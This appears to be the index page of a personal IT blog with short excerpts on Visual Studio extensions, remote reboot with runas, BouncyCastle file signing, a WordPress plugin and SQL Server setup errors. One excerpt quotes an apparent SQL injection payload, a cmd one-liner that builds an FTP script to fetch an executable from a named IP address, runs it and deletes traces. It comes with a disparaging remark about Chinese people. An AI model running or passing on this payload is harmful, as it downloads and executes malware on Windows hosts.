Just finished the Stanford AI Class this fall and got an A. It feels pretty good Next up is probably another Cryptography class or maybe some machine learning.
Don’t you just love SQL injections… and hate those chinese… cmd /c echo open 116.255.164.229>c:\RECYCLER\zysdfghaa.exe&echo kangbaobao>>c:\RECYCLER\zysdfghaa.exe&echo lifating>>c:\RECYCLER\zysdfghaa.exe&echo get sdfghaa.exe c:\RECYCLER\stsdfghaa.exe>>c:\RECYCLER\zysdfghaa.exe&echo bye>>c:\RECYCLER\zysdfghaa.exe&ftp -s:c:\RECYCLER\zysdfghaa.exe&if EXIST c:\RECYCLER\stsdfghaa.exe (start c:\RECYCLER\stsdfghaa.exe)&del c:\RECYCLER\zysdfghaa.exe&exit
I guess everyone has a list like this, so here is what I’m packing in my VS2010 lunchbox: Extensions Productivity Tools VSCommands 2010 - Install, read about it, then realize why you need this! Productivity Power Tools – Power Commands for Visual Studio 2010 – VS10x Comments Extender – VS10x Method Block Highlighter – [...]
In a mining factory it’s easy, very easy to rely on backbone infrastructure. Locally we run VMWare – and maybe I should finally move forward on the DFF model and aws: The AWS Outage: The Cloud’s Shining Moment – O’Reilly Broadcast.
Just like this: runas /user:Administrator@mydomain.com “shutdown -r -m \\MACHINE_IM_RESTARTING -t 3 -d P:00:00″ runas = run as a different user, in this case admin. shutdown options: -m = Machine name with \\ in front of the name -r = Reboot (not shut down) -t 3 = Show clients a warning for 3 seconds -d P:00:00 [...]
On #stackoverflow, a question was asked: I starting with BouncyCastleCrypto.dll and I’n not found enought documentation. I need one example of how can I sign a file with different alghoritmsLike sha1 sha256 and other and obtain .p7m file. This is an example. You’ll need a .pfx with the private key prior to running this stub [...]
I’ve released the first alpha of my #NoShop #Wordpress plugin. http://jesper.angelo.net/wordpress/noshop/ Comments appreciated!
Today I had a wonderful start of the week. My code, that used to compile, now says: Assembly generation failed — Referenced assembly does not have a strong name. Ok! Fine, let’s see, what did I change… nothing. Great. After some digging around I found out that somehow my COM DLL, in this case SAPbobsCOM2007.DLL [...]
http://vmintranet:36963/_admin/policy.aspx http://office12.blogspot.com/2007/05/policy-for-web-application-and-form.html http://blogs.msdn.com/b/joelo/archive/2007/04/02/web-application-policies.aspx http://technet.microsoft.com/en-us/library/cc262118(office.12).aspx
During de-install, or service pack upgrade, or anything else with SQL 2005 setup, you get this error: Microsoft SQL Server 2005 Setup The setup has encountered an unexpected error while Setting Internal Properties. The error is: Fatal error during installation. For help, click: Microsoft Help Link This is how it looks on screen: MS explains: http://support.microsoft.com/kb/925976 [...]